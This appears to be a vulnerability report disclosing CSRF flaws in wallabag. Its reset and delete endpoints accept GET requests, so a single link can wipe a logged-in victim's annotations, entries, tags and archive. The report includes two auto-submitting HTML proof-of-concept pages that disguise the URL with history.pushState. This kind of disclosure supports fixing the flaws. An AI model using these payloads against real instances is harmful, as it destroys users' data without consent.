Description

I find wallabag suffering several Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily delete the victim user’s annotations, entries and tags by the GET request to /reset/annotations, /reset/entries, /reset/tags, /reset/archived, as well as /delete/[Entry ID], in which the [Entry ID] can be estimated easily as it is indexed from 1 and increased by 1 when a new entry is added. The attackers can simply craft all these dangous actions in one link and then drive the victim to detele them all in one click.

Proof of Concept

For /reset/annotations
Login as a user.
Open the following HTML file in the browser.

// PoC.js
<html>
  
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://example.com/reset/annotations">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

For /reset/entries, /reset/tags and /reset/archived, we can simply modify the above PoC by changing annotations to entries, tags or archived.

For /delete/[Entry ID]
Login as a user.
Find an entry ID, here we find the [Entry ID]=10.
Open the following HTML file in the browser.

// PoC.js
<html>
  
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://example.com/delete/10">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

The added entry has been deteleted.